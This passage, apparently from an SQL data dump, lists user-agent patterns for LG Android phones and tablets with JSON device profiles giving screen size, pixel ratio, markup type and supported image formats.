Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E425f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E425f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E425g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E425g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E430) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E430-Orange) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E431g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E435) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E435f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E440) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E440) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E445) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E445) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E450) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E450f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E450g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E451g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E455) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E455) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E460) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E460) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E460/V10f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E467f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E610) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E610/V20a) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E610v) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E610v/V10g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E612) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E612f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E612g) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E612g) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E615) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E615f) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E970) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E975) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E980) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E987) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-E988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F180L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F180S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F200S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":512,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F240K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F240L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F240S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F260S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F320S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F340S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F350L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F430L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F460L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F460S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-F470K/10w) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-H220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-H220-Orange) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-H221) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-H221AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-H222) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-L160L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-L160L) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-LG730) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-LS980) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P659) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P705) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P710) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P713) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P713) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P714) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P714) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P715) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P715) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P716) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P760) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P760) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P760/V20c) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P765) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P768) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P769) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P769) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P940) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-P990) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-V500) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-X135) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; LG-X145) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 